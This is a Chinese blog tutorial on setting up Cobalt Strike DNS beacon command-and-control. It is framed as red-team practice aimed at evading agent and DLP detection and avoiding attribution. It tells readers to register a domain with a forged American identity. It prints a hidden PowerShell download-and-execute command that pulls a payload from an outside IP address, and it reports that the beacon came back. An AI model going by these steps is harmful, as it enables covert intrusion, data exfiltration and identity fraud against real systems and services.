前言

• 实际意义：红蓝对抗中，可以通过DNS的方式通信，流量更加隐秘，躲避agent/DLP的检测，实现相对隐秘的渗透方式，反溯源。

• 环境：vps（linux）注意这里有个雷区，需要打开53端口的TCP和UDP，截个图大家看看，这个地方我踩哭了，因为新手一直以为是TCP，结果因为没开UDP，导致一直不成功。

• 前期思路准备：

  1、国外域名

  2、cobaltstrike 3.3

  3、国外代理

域名和解析域名服务器的免费申请和配置

1、挂上代理，去国外免费域名网站找一个域名注册

2、然后点击免费获取，然后接着往下走

3、这里需要注意，因为ip检查，可能正常的瞎填信息无法获取订单，首先去查ip网站确定我们代理的具体位置

4、这里是美国地区，所以伪造一个美国人的身份信息，利用美国人身份生成网站，同理，如果你是德国地区，去找一个伪造德国人身份的网站就行了。接着输入，我们刚刚查到的州名字

5、将获得的信息填入订单信息中，然后提交，这样应该不会报错

6、接着进入自己的域名区域

7、可以看到多了一个

8、打开dns解析的服务器，注册一个号，添加域名，他会提醒你要修改原服务器的ns，所以改一下，不然没用了

①点管理域

②在管理工具中的NamesServers中点击自定义服务器名，这样就完成了，可以解析了

9、就可以看到解析成功了

10、绕了一路终于到了设置解析了

11、接着在vps中打开teamserver，就可以连接了

DNS beacon cs上线

其实只要前面的步骤都做对了，后面的操作就比较基础了

1、支持命令行切换到该模式：mode dns，将http通信方式，改为使用dns的a记录方式进行通信(传输数据小)，下面和上面的差不多

2、同上，mode dns-txt只是改为使用dns的txt方法进行通信（传输数据大）有效负载使用dns txt记录下载和分级混合http和dns beacon

首先打开监听，然后按照图片设置，默认是53端口

景象会是这样的

可以用lsof查看53端口是否打开

接着用dig +trace来看看是否走的通

内容过长，只看重点

这就成功了，接着我们生成一个web传递试试效果

1

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://47.99.163.64:80/a'))"

接着找一个windows 3以上的服务器运行一下就行了

收到一个了一个黑屏的beacon

接着我们可以用sleep 5 或者是checkin，将其回显

我的个人博客

孤桜懶契：http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契